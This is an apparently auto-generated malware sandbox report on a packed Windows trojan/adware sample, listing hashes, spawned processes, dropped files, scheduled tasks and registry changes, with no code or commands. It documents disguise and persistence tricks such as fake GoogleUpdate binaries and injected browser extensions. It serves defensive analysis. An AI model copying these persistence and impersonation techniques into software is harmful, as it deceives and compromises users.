not-a-virus:AdWare.NSIS.Adwapper.cd (Kaspersky), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 33f4c0b6bc10c582d33ea7f8431b8c85
SHA1: 59d908a83367fb69ee4853ff33c83333deca5bb6
SHA256: cbc1dbbc5607c23186b73e5cb13b979ab668d403308b48fd9bf8342860958a37
SSDeep: 196608:q3t6ahuiKVf6FkqPgGczMsCAsRG7jEik/Ce3e4sP/fbSUTcRyQvCrvH:q3tBwiofwVYGodjFIBDUTcPq7H
Size: 11336880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process GoogleUpdate.exe:1272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)
The process GoogleUpdate.exe:2032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{802A0BF3-D6B3-4F6C-B8D7-B6C3243887F5}-setup.exe (0 bytes)
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
The process winservice86-codedownloader.exe:2888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (0 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (0 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (0 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (0 bytes)
Registry activity
The process GoogleUpdate.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 30 68 94 0B 1C F4 87 36 47 06 A6 66 63 A0 D0"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
